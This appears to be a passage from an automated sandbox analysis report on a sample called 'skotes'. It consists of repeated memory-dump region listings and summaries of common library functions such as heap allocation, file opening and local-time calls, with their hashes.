                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$LocalSpecificSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2574697306-0
                                                                                                                                                                    • Opcode ID: a8c9c90ca2a6bf38bd5980093bb8e0ae406d1d72dbf4fdde231c5d60bdd23324
                                                                                                                                                                    • Instruction ID: dc5868c854968e8fc4a36baea08f1da995898b5b3e10c9b1aecae55c176b4521
                                                                                                                                                                    • Opcode Fuzzy Hash: a8c9c90ca2a6bf38bd5980093bb8e0ae406d1d72dbf4fdde231c5d60bdd23324
                                                                                                                                                                    • Instruction Fuzzy Hash: 3611FAB290410DEBDB10DF95C981EDFB7BDAF08354F645266E915E3180EB30EA49CB61
                                                                                                                                                                    Function 0064AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                    • Opcode ID: de42764683fde76fe1f4e86d7ccf88c9394c21f491d043236b19156eae78d688
                                                                                                                                                                    • Instruction ID: 989c4286503d1ee776ca4b42538ff380b6bdd457f55eaeebbd66ec1b8328bfea
                                                                                                                                                                    • Opcode Fuzzy Hash: de42764683fde76fe1f4e86d7ccf88c9394c21f491d043236b19156eae78d688
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A111571A0420AAFDB06DF98E941ADA7BF5EF48304F0440A9F809AB351D670EE25CB65
                                                                                                                                                                    Function 0064D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0064A813,00000001,00000364,00000006,000000FF,?,0062D3FC,2054CAE1,?,00627A8B,?), ref: 0064D871
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: fe475c0c6028c1c4d8235b4b9d36b8ff27b3885f0a83bbaf7f53596cc0ca196c
                                                                                                                                                                    • Instruction ID: cfe3af5aaa182d82b114e7f6bd510e5a9fc0b39ebd0bd087c8a63a18f72b05d3
                                                                                                                                                                    • Opcode Fuzzy Hash: fe475c0c6028c1c4d8235b4b9d36b8ff27b3885f0a83bbaf7f53596cc0ca196c
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0E232E116246EEB613A729C01BBF375BDF95370B188021FC08AB291DA20EC0186E0
                                                                                                                                                                    Function 0064B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,2054CAE1,?,?,0062D3FC,2054CAE1,?,00627A8B,?,?,?,?,?,?,00617465,?), ref: 0064B07E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: cfecfb5d1899cf07ecf080c6090349f2dab630fb393d1e943151d7ea7b689a1e
                                                                                                                                                                    • Instruction ID: e2cb37108564eb8d964eaf3ec0c32389af3209cf134d1877958bb167f9c33a6b
                                                                                                                                                                    • Opcode Fuzzy Hash: cfecfb5d1899cf07ecf080c6090349f2dab630fb393d1e943151d7ea7b689a1e
                                                                                                                                                                    • Instruction Fuzzy Hash: 92E0223124022296EB313239CC00BEFB64BCF42BB2F043210FD38A62A0EF60DC0081E4
                                                                                                                                                                    Function 00651775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00651B65,?,?,00000000,?,00651B65,00000000,0000000C), ref: 00651792
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
